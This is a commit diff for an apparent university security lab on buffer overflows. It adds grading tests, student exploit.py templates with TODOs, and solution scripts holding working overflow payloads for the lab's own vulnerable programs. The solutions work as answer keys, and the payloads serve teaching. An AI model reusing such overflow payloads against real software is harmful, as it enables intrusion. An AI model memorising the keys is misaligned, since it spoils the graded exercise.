labs/lab-10: Add checker infrastructure

- Added for each task a directory named tests
- Added for each task a specified checker in directory tests
- Added for each task an exploit.py file with some TODOs
- Updated the hardcoded part and got rid of the fixed payload
- Added instructions in the README about completing exploit.py TODOs and running make check in tests for showing the results
- Added some detailed explanations in README files
- Deleted the exploit.py files from stack_buffer directory
- Added more detailed tests for stack_buffer exercise

Fixes #43

Signed-off-by: Alexandru Braslasu <[email protected]>

Author: alexbraslasu

labs/lab-10/tasks/overflow-for-binary/README.md

@@ -21,6 +21,19 @@ If you're having difficulties solving this exercise, go through [this](../../rea
 
 > **WARNING** If you try using a payload generated with python and it doesn't work, try simply copying its content in the terminal
 
+## Checking Your Solution
+
+In order to verify your exploit, please complete the `exploit.py` TODOs.
+Afterwards, navigate to the `tests` directory and run:
+
+```Bash
+make check
+test........................................passed
+Total:                                      100/100
+```
+
+If your solution is correct, you will receive a `100/100` result.
+
 ## Resources
 
 If you found the laboratory interesting in a positive way, you can learn more about this type of attack, as well as cybersecurity in general, on this [channel](https://www.youtube.com/c/LiveOverflow).

labs/lab-10/tasks/overflow-for-binary/solution/exploit.py

@@ -0,0 +1,11 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    argument = 32 * "A" + "\x50\x52\x30\x4e"
+    subprocess.run(["./overflow_in_binary", argument])
+
+
+if __name__ == "__main__":
+    run_executable()

labs/lab-10/tasks/overflow-for-binary/support/exploit.py

@@ -0,0 +1,11 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    argument = ""  # TODO: Put here the payload you have discovered
+    subprocess.run(["../support/overflow_in_binary", argument])
+
+
+if __name__ == "__main__":
+    run_executable()

labs/lab-10/tasks/overflow-for-binary/tests/Makefile

@@ -0,0 +1,24 @@
+CC     = gcc
+CFLAGS = -Wall -Wextra -O2
+TARGET = test_overflow_for_binary
+
+SRCS = test_overflow_for_binary.c graded_test.c
+
+OBJS = $(SRCS:.c=.o)
+
+all: $(TARGET)
+
+$(TARGET): $(OBJS)
+	$(CC) $(CFLAGS) $(OBJS) -o $@
+
+%.o: %.c
+	$(CC) $(CFLAGS) -c $< -o $@
+
+clean:
+	rm -f $(TARGET) $(OBJS)
+
+check: all
+	./run_all_tests.sh
+	$(MAKE) clean
+
+.PHONY: all clean test

labs/lab-10/tasks/overflow-for-binary/tests/graded_test.c

@@ -0,0 +1,72 @@
+// SPDX-License-Identifier: BSD-3-Clause
+
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/param.h>
+
+#include "./graded_test.h"
+
+/*
+ * Print test result. Printed message should fit in 72 characters.
+ *
+ * Print format is:
+ *
+ * description ...................... passed ... NNN
+ * description ...................... failed ... NNN
+ *   32 chars        24 chars           6     3   3
+ */
+
+static void print_test(const char *description, int result)
+{
+	/* Make these global linkage, so it's only allocated once. */
+	static char print_buffer[74];
+	static const char failed[] = "failed";
+	static const char passed[] = "passed";
+	size_t i;
+	size_t len;
+
+	/* Collect description in print_buffer. */
+	len = MIN(strlen(description), 32);
+	for (i = 0; i < len; i++)
+		print_buffer[i] = description[i];
+
+	/* Collect dots in print_buffer. */
+	for (i = 0; i < 40; i++)
+		print_buffer[12+i] = '.';
+
+	/* Collect passed / failed. */
+	for (i = 0; i < 6; i++) {
+		if (result == 1)
+			print_buffer[52+i] = passed[i];
+		else
+			print_buffer[52+i] = failed[i];
+	}
+
+	/* Collect newline. */
+	print_buffer[59] = '\n';
+
+	int ret = write(1, print_buffer, 58);
+
+	if (ret == -1)
+		return;
+}
+
+void run_test(struct graded_test *test)
+{
+	int res;
+
+	res = test->function();
+	print_test(test->description, res);
+#ifdef EXIT_IF_FAIL
+	exit(EXIT_FAILURE);
+#endif
+}
+
+void run_tests(struct graded_test *tests, size_t count)
+{
+	size_t i;
+
+	for (i = 0; i < count; i++)
+		run_test(&tests[i]);
+}

labs/lab-10/tasks/overflow-for-binary/tests/graded_test.h

@@ -0,0 +1,20 @@
+/* SPDX-License-Identifier: BSD-3-Clause */
+
+#include <stddef.h>
+
+#ifndef GRADED_TEST_H_
+#define GRADED_TEST_H_	1
+
+/* test function prototype */
+typedef int (*test_f)(void);
+
+struct graded_test {
+	test_f function;		/* test/evaluation function */
+	char *description;		/* test description */
+	size_t points;			/* points for each test */
+};
+
+void run_test(struct graded_test *test);
+void run_tests(struct graded_test *tests, size_t count);
+
+#endif /* GRADED_TEST_H_ */

labs/lab-10/tasks/overflow-for-binary/tests/run_all_tests.sh

@@ -0,0 +1,12 @@
+#!/bin/bash
+# SPDX-License-Identifier: BSD-3-Clause
+
+./test_overflow_for_binary | tee results.txt
+
+total=$(if tail -n 1 results.txt | grep -q 'passed$'; then echo 100; else echo 0; fi)
+echo ""
+echo -n "Total:      "
+echo -n "                                "
+LC_ALL=C printf "%3d/100\n" "$total"
+
+rm results.txt

labs/lab-10/tasks/overflow-for-binary/tests/test_overflow_for_binary.c

@@ -0,0 +1,36 @@
+// SPDX-License-Identifier: BSD-3-Clause
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <assert.h>
+#include <sys/wait.h>
+
+#include "graded_test.h"
+
+static int test(void)
+{
+	FILE *pipe = popen("python3 ../support/exploit.py", "r");
+
+	if (!pipe)
+		return 0;
+
+	char buffer[512];
+	int found = 0;
+
+	while (fgets(buffer, sizeof(buffer), pipe))
+		if (strstr(buffer, "Great success!") != NULL)
+			found = 1;
+
+	return found;
+}
+
+static struct graded_test all_tests[] = {
+	{ test, "test", 100},
+};
+
+int main(void)
+{
+	run_tests(all_tests, sizeof(all_tests) / sizeof(all_tests[0]));
+	return 0;
+}

labs/lab-10/tasks/overflow-in-c/README.md

@@ -96,4 +96,17 @@ Not quite there. Try again!
 Aborted (core dumped)
 ```
 
+## Checking Your Solution
+
+In order to verify your exploit, please complete the `exploit.py` TODOs.
+Afterwards, navigate to the `tests` directory and run:
+
+```Bash
+make check
+test........................................passed
+Total:                                      100/100
+```
+
+If your solution is correct, you will receive a `100/100` result.
+
 If you're having difficulties solving this exercise, go through [this](../../reading/overflow-vuln.md) reading material.

labs/lab-10/tasks/overflow-in-c/solution/exploit.py

@@ -0,0 +1,13 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    subprocess.run(["make"], check=True, cwd="../support")
+    payload = 73 * "A" + "\x4d\x49\x41\x55"
+    subprocess.run(["../support/do_overflow"], input=payload, universal_newlines=True)
+    subprocess.run(["make", "clean"], check=True, cwd="../support")
+
+
+if __name__ == "__main__":
+    run_executable()

labs/lab-10/tasks/overflow-in-c/support/exploit.py

@@ -0,0 +1,13 @@
+# SPDX-License-Identifier: BSD-3-Clause
+import subprocess
+
+
+def run_executable():
+    subprocess.run(["make"], check=True, cwd="../support")
+    payload = ""  # TODO: Put here the payload you have discovered
+    subprocess.run(["../support/do_overflow"], input=payload, universal_newlines=True)
+    subprocess.run(["make", "clean"], check=True, cwd="../support")
+
+
+if __name__ == "__main__":
+    run_executable()

labs/lab-10/tasks/overflow-in-c/tests/Makefile

@@ -0,0 +1,24 @@
+CC     = gcc
+CFLAGS = -Wall -Wextra -O2
+TARGET = test_overflow_in_C
+
+SRCS = test_overflow_in_C.c graded_test.c
+
+OBJS = $(SRCS:.c=.o)
+
+all: $(TARGET)
+
+$(TARGET): $(OBJS)
+	$(CC) $(CFLAGS) $(OBJS) -o $@
+
+%.o: %.c
+	$(CC) $(CFLAGS) -c $< -o $@
+
+clean:
+	rm -f $(TARGET) $(OBJS)
+
+check: all
+	./run_all_tests.sh
+	$(MAKE) clean
+
+.PHONY: all clean test

labs/lab-10/tasks/overflow-in-c/tests/graded_test.c

@@ -0,0 +1,72 @@
+// SPDX-License-Identifier: BSD-3-Clause
+
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/param.h>
+
+#include "./graded_test.h"
+
+/*
+ * Print test result. Printed message should fit in 72 characters.
+ *
+ * Print format is:
+ *
+ * description ...................... passed ... NNN
+ * description ...................... failed ... NNN
+ *   32 chars        24 chars           6     3   3
+ */
+
+static void print_test(const char *description, int result)
+{
+	/* Make these global linkage, so it's only allocated once. */
+	static char print_buffer[74];
+	static const char failed[] = "failed";
+	static const char passed[] = "passed";
+	size_t i;
+	size_t len;
+
+	/* Collect description in print_buffer. */
+	len = MIN(strlen(description), 32);
+	for (i = 0; i < len; i++)
+		print_buffer[i] = description[i];
+
+	/* Collect dots in print_buffer. */
+	for (i = 0; i < 40; i++)
+		print_buffer[12+i] = '.';
+
+	/* Collect passed / failed. */
+	for (i = 0; i < 6; i++) {
+		if (result == 1)
+			print_buffer[52+i] = passed[i];
+		else
+			print_buffer[52+i] = failed[i];
+	}
+
+	/* Collect newline. */
+	print_buffer[59] = '\n';
+
+	int ret = write(1, print_buffer, 58);
+
+	if (ret == -1)
+		return;
+}
+
+void run_test(struct graded_test *test)
+{
+	int res;
+
+	res = test->function();
+	print_test(test->description, res);
+#ifdef EXIT_IF_FAIL
+	exit(EXIT_FAILURE);
+#endif
+}
+
+void run_tests(struct graded_test *tests, size_t count)
+{
+	size_t i;
+
+	for (i = 0; i < count; i++)
+		run_test(&tests[i]);
+}

labs/lab-10/tasks/overflow-in-c/tests/graded_test.h

@@ -0,0 +1,20 @@
+/* SPDX-License-Identifier: BSD-3-Clause */
+
+#include <stddef.h>
+
+#ifndef GRADED_TEST_H_
+#define GRADED_TEST_H_	1
+
+/* test function prototype */
+typedef int (*test_f)(void);
+
+struct graded_test {
+	test_f function;		/* test/evaluation function */
+	char *description;		/* test description */
+	size_t points;			/* points for each test */
+};
+
+void run_test(struct graded_test *test);
+void run_tests(struct graded_test *tests, size_t count);
+
+#endif /* GRADED_TEST_H_ */

labs/lab-10/tasks/overflow-in-c/tests/run_all_tests.sh

@@ -0,0 +1,12 @@
+#!/bin/bash
+# SPDX-License-Identifier: BSD-3-Clause
+
+./test_overflow_in_C | tee results.txt
+
+total=$(if tail -n 1 results.txt | grep -q 'passed$'; then echo 100; else echo 0; fi)
+echo ""
+echo -n "Total:      "
+echo -n "                                "
+LC_ALL=C printf "%3d/100\n" "$total"
+
+rm results.txt